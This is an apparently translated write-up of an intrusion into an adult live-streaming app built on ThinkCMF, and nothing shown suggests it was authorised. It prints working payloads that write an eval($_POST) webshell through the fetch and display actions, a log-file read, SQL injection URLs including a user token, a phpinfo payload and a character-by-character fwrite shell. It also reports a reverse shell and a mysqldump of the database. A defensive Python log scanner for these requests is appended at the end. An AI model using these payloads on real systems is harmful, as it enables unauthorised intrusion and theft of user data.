
Title: A write-up of one penetration test of a certain adult live-streaming app


On a sunny night I was happily scrolling through Twitter when I suddenly noticed that the "recommended to follow" section was showing a business card for xxxx video.

This, this, this, this. I am a serious person; I have no idea why Twitter pushed these to me. This had to be dealt with: open the promotion link and download the app.

As soon as this app opens it gives off a familiar smell. It looks very likely to be a secondary development built on TP (ThinkPHP).

I registered with a mobile phone number and used Fiddler to capture and modify the packets. The content is honestly rather eye-catching.

From the captured packets I obtained the URL and found that this was just ThinkCMF? I grinned and thought there was no way I wouldn't take this down: the front end has so many RCEs that even with a WAF I could do it in seconds. Reality, however, quickly slapped me in the face.

Execute the PoC. Payload 1:

/index.php?g=apim=Oautha=fetchcontent=phpfile_put_contents('pass.php','?php @eval($_POST[1]);')/php

Payload 2:

/?a=fetch;templateFile=public/indexprefix=''content=phpfile_put_contents('pass.php','?php@eval($_POST[1]);')/php

Payload 3:

?a=displaytemplateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();%3E

and arbitrary file read:

/?a=displaytemplateFile=data/runtime/Logs/Portal/YY_MM_DD.log

In the end a one-line m.php Trojan file is generated in the directory; of course it can also be written as other payloads.

The operation was as fierce as a tiger, but when I went to look at the file: 404. Is it going to be cold?

Don't worry, this app also has SQL injection. Injection point 1:

/index.php?g=Appapim=Videovideoid=1

Injection point 2:

/index.php?g=Appapim=Autha=indexuid=128889token=b69cda34dff2fa978a94b5583e7f5c9a

The injection is cool too. Does it seem like the rhythm wants me to pull out a 0day? Forget it, let's hold back. After some research (the details will not be posted; a thousand words are omitted here, and saying too much only brings tears), phpinfo finally came out, with the payload for version 7.2 and above:

/?a=fetchcontent=?=phpinfo();exit();

Isn't this one step closer to a shell? Then I saw that disable_functions disables so many functions.

I tried writing with the assert function here and thought it was done, but the result still just returned 1.

The @assert function does not work. Here you can try reading files with file_get_contents and read the database configuration file.

As I continued reading config.php, I suddenly remembered that when I downloaded the app it was hosted on Alibaba Cloud OSS. Logically its configuration file should contain an Alibaba Cloud key and id, but reality is cruel after all: I did not even see the letters "aliyun".

There is nothing to read in the configuration files, and neither the database nor redis can be connected to from outside. So I planned to write a shell and go through things carefully, and tried to write the file with file_put_contents.

It seems that did not work. Is it a parameter problem? file_get_contents can read any file, so is it that the directory cannot be written? Trying to write to /tmp/1.txt reported the same error. I figured PHP must have other functions for writing files, so I went flipping through w3school.

Write 123 to i.txt, and the file is written successfully.

Then I tried writing a PHP one-liner, and it said the template does not exist. What to do? I saw the shell was within reach. Looking carefully at the fwrite parameters: w+ opens for writing and r+ appends. Do I want to write it one character at a time? That's right, just write it one character at a time.

a=fetchcontent=%3C?=@$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27%27);exit();

Finally got a shell.

Bypassed the command execution restrictions and got a reverse shell.

Then package it up and dump the database.

mysqldump -h127.0.0.1 -uxxxx -p
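As an added defender-side example (not code from the original post or from ThinkCMF itself): the write-up above relies on ThinkCMF's fetch/display actions accepting attacker-controlled content and templateFile parameters, first to run phpinfo, then to read a log file, then to write a shell one character at a time. Those request shapes are easy to spot in a web server's access log. The scanner below parses combined-format log lines (the sample lines are constructed for the demo) and flags three things: a fetch/display action combined with a content or templateFile parameter, a PHP open tag inside any decoded parameter value, and a templateFile value that points outside the template directory (path traversal or a .log file). The rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). The second and
# third requests mirror the fetch/display shapes used in the write-up; the
# others are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?g=portal&m=index&a=index HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /?a=fetch&content=%3C%3F%3Dphpinfo()%3Bexit()%3B HTTP/1.1" 200 7001
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /?a=display&templateFile=data/runtime/Logs/Portal/20_01_01.log HTTP/1.1" 200 4096
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "POST /index.php?g=user&m=login&a=dologin HTTP/1.1" 302 0
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD URL PROTO", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# ThinkCMF controller actions that render caller-supplied template input.
TEMPLATE_ACTIONS = {"fetch", "display"}
TEMPLATE_PARAMS = {"content", "templateFile"}


def parse_query(url):
    """Return {name: [values]} for the query string of url, percent-decoded.

    Splits only on '&' so the result does not depend on the Python version's
    parse_qs defaults.
    """
    _, _, query = url.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def analyze_request(url):
    """Return the list of detection rules the request URL triggers (empty if clean)."""
    params = parse_query(url)
    rules = []

    # Rule 1: fetch/display action driven by a caller-supplied template or content.
    actions = {v.lower() for v in params.get("a", [])}
    if actions & TEMPLATE_ACTIONS and TEMPLATE_PARAMS & set(params):
        rules.append("thinkcmf_template_action")

    # Rule 2: a PHP open tag in any decoded parameter value, wherever it lands.
    if any("<?" in v for values in params.values() for v in values):
        rules.append("php_open_tag_in_parameter")

    # Rule 3: templateFile escaping the template tree or pointing at a log file.
    for v in params.get("templateFile", []):
        if ".." in v or v.lower().endswith(".log"):
            rules.append("templateFile_outside_templates")
            break
    return rules


def scan_log(text):
    """Scan access-log text; return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rules = analyze_request(m.group("url"))
        if rules:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "url": m.group("url"), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], ", ".join(f["rules"]), f["url"])
```

Run it against a real log with `scan_log(open(path).read())`. Rule 1 alone is noisy on a site that legitimately calls fetch/display, so treat it as a correlation signal; rules 2 and 3 are the ones worth alerting on directly. The same decoding step matters for a WAF: the phpinfo request above is only recognisable after percent-decoding the content parameter.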
